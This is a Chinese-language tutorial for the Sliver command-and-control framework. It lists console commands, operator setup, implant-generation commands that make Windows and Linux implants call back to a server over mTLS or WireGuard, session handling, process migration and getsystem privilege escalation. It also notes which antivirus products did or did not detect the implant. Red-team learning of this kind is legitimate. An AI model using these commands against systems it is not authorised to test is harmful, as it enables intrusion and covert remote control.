sliver

https://github.com/BishopFox/sliver
https://github.com/BishopFox/sliver/wiki/Compile-From-Source
https://www.youtube.com/watch?v=3R6WKUgN0K4

运行sliver

命令参数

Commands:
=========
  clear       清除屏幕
  exit        退出shell
  help        帮助
  monitor     监视器
  wg-config   生成新的WireGuard配置
  wg-portfwd  列出WireGuard端口
  wg-socks    列出监听WireGuard服务器

Generic:
========
  aliases           列出当前别名
  armory            自动下载并安装扩展模块/别名
  background        后台活动会话
  beacons           信标管理
  builders          列出外部构建器
  canaries          列出以前生成的canaries
  cursed            谷歌浏览器开发者工具包？
  dns               启动DNS监听
  env               列出环境变量
  generate          生成二进制文件
  hosts             管理主机数据库
  http              启动http监听
  https             启动https监听
  implants          列出生成的马
  jobs              控制器
  licenses          开源许可
  loot              管理服务器商店
  mtls              启动mTLS监听
  prelude-operator  管理与Prelude操作员的连接？
  profiles          列出现有配置文件
  reaction          管理对事件的自动反应
  regenerate        重新生成注入？
  sessions          会话管理
  settings          管理客户端设置
  stage-listener    启动分段监听程序
  tasks             信标任务管理
  update            检查更新
  use               切换活动会话或信标
  version           显示版本信息
  websites          Host static content (used with HTTP C2)
  wg                启动WireGuard监听

Multiplayer:
============
  kick-operator  踢人
  multiplayer    开启多人模式
  new-operator   创建新的用户配置文件
  operators      管理员设置
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

如何使用

开启多人模式
创建用户配置文件

new-operator --name test --lhost ServerIP
1

[server] sliver > new-operator --name test --lhost 172.16.89.149

[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /home/sliver/test_172.16.89.149.cfg
1
2
3
4

server默认会监听一个端口31337，可以修改掉~/.sliver/configs/server.json

下载对应客户端，导入server生成的配置文件，连接

./sliver-client_macos import test_172.16.89.149.cfg
2022/11/03 10:40:59 Saved new client config to: /Users/wp_mac/.sliver-client/configs/test_172.16.89.149.cfg
1
2

生成implant

支持mac、windows、linux
implant支持mtls、WireGuard、http/https、dns、namedpipe、tcp等协议的上线

generate --mtls <Server IP> --save ./test.exe --os Windows
generate --wg 172.16.89.149:8088 --save ./web.elf --os linux
1
2

启动mtls监听

defender直接删了

关闭defender后使用360没有检测出威胁

弹回会话有ip，端口，主机名，系统架构，时间信息

使用session查看所有会话信息

操作会话

sessions -i sessionID 进入会话
sessions -k sessionID 杀死会话
1
2

其它

operators 查看用户在线
implants 查看生成的马

ps 列出进程
migrate 迁移进程

getsystem 提权